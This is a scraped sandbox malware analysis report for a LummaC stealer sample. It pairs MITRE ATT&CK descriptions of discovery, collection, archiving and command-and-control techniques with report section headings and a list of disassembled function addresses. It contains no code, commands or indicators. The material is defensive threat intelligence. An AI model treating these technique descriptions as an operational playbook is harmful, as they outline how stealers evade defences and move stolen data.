Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report klFMCT64RF.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: LummaC

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Authenticode Signature

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Possible Origin

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

Windows Analysis Report
klFMCT64RF.exe

Function 0044A2A0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 14
libraryCOMMON

Function 004100A0 Relevance: 4.2, Strings: 3, Instructions: 442
COMMON

Function 0044DD80 Relevance: 2.6, Strings: 2, Instructions: 145
COMMON

Function 0040CC90 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 162
threadCOMMON

Function 0044987B Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63
libraryCOMMON

Function 004472D8 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 43
memoryCOMMON

Function 0044A57B Relevance: 3.0, APIs: 2, Instructions: 20
COMMON

Function 00449AD0 Relevance: 1.6, APIs: 1, Instructions: 72
memoryCOMMON

Function 0044728C Relevance: 1.5, APIs: 1, Instructions: 9
memoryCOMMON